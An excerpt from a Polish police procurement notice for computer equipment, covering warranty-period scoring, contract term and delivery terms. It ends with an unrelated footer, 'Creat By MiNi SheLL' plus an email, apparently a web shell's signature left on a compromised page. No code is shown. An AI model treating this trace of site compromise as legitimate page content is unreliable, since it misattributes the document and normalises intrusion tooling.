2. W kryterium okresu gwarancji na zaoferowany asortyment Zamawiający przyznał  łącznie wagę 5 punktów odpowiadających 5 % ogólnej oceny oferty.  W ramach tego kryterium Zamawiający zastosuje dwa podkryteria:

a) podkryterium 1 - Okres gwarancji na :
komputer PC z oprogramowaniem (pakietem biurowym) , monitor LCD 21,5, komputer przenośny z oprogramowaniem (pakietem biurowym), urządzenie wielofunkcyjne formatu A3, drukarkę  laserową sieciową (kolor, mono) - waga 2,5 punktu  odpowiadających 2,5% ogólnej oceny oferty.
Ilość punktów w tym podkryterium zostanie przyznana następująco:
0 pkt - za okres gwarancji  wnoszący 24 miesiące
2,5 pkt - za okres gwarancji  wynoszący 36 miesięcy

Zamawiający wymaga, aby gwarancja podana była w pełnych miesiącach, minimalny okres gwarancji wymagany przez Zamawiającego to  24 miesiące.
Najkorzystniejsza oferta w odniesieniu do tego podkryterium może uzyskać maksymalnie 2,5  punktu. Jeżeli Wykonawca w ofercie nie poda okresu gwarancji, Zamawiający uzna, że okres gwarancji na zaoferowany asortyment wynosi 24 miesiące, a Wykonawca otrzyma 0 punktów. 
W przypadku podania przez Wykonawcę krótszego niż wymagany okres gwarancji na zaoferowany asortyment, oferta Wykonawcy zostanie  odrzucona na podstawie art. 89 ust. 1 pkt 2) ustawy Pzp. 
W przypadku zaoferowania dłuższego okresu gwarancji niż 36 miesięcy Zamawiający przyzna punktację jak za  okres  36 miesięcy, a oferta Wykonawcy uzyska  2,5 punktu.

Okres gwarancji liczony będzie od momentu podpisania odbioru ilościowego.

b) podkryterium 2 - Okres gwarancji na :
czytnik kart mikroprocesorowych, projektor multimedialny  z ekranem, skaner - waga 2,5 punktu  odpowiadających 2,5% ogólnej oceny oferty.


Ilość punktów w tym podkryterium zostanie przyznana następująco:
0 pkt - za okres gwarancji  wynoszący12 miesięcy
2,5 pkt - za okres gwarancji  wynoszący 24 miesięcy

Zamawiający wymaga, aby gwarancja podana była w pełnych miesiącach, minimalny okres gwarancji wymagany przez Zamawiającego to  12 miesięcy.
Najkorzystniejsza oferta w odniesieniu do tego podkryterium może uzyskać maksymalnie 2,5  punktu. Jeżeli Wykonawca w ofercie nie poda okresu gwarancji, Zamawiający uzna, że okres gwarancji na zaoferowany asortyment wynosi 12 miesięcy, a Wykonawca otrzyma 0 punktów. 
W przypadku podania przez Wykonawcę krótszego niż wymagany okres gwarancji na zaoferowany asortyment, oferta Wykonawcy zostanie  odrzucona na podstawie art. 89 ust. 1 pkt 2) ustawy Pzp. 
W przypadku zaoferowania dłuższego okresu gwarancji niż  24 miesiące Zamawiający przyzna punktację jak za  okres  24 miesięcy, a oferta Wykonawcy uzyska  2,5 punktu.

Okres gwarancji liczony będzie od momentu podpisania odbioru ilościowego.

c)Łączna liczba punktów jaką Wykonawca może uzyskać w kryterium okresu gwarancji na zaoferowany asortyment liczona będzie wg następującego wzoru:

             Og = Og(1) +Og(2)

             gdzie:

Og - suma punktów uzyskana w kryterium okresu gwarancji na zaoferowany    asortyment
Og(1) -ilość punktów uzyskana w podkryterium nr 1, tj. okres gwarancji na :
           komputer PC z oprogramowaniem (pakietem biurowym) , monitor LCD 21,5, komputer przenośny z oprogramowaniem (pakietem biurowym), urządzenie wielofunkcyjne formatu A3, drukarkę  laserową sieciową (kolor, mono)
 Og(2) -ilość punktów uzyskana w podkryterium nr 2, tj. okres gwarancji na :
           czytnik kart mikroprocesorowych USB, projektor multimedialny z ekranem, skaner.



3.Termin obowiązywania umowy -  50 dni od daty podpisania umowy.  Za datę wykonania (dostawy) przedmiotu umowy przyjmuje się datę zatwierdzenia protokołu odbioru ilościowego.
4. Odbiór dostawy następować będzie w siedzibie Zamawiającego, tj. w Komendzie Wojewódzkiej Policji w Rzeszowie, ul. Dąbrowskiego 30,  a podstawą potwierdzenia dostawy będzie protokół odbioru ilościowego.
5. Wykonawca zobowiązany jest do dostarczenia przedmiotu zamówienia własnym transportem i na własny koszt do siedziby Zamawiającego..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com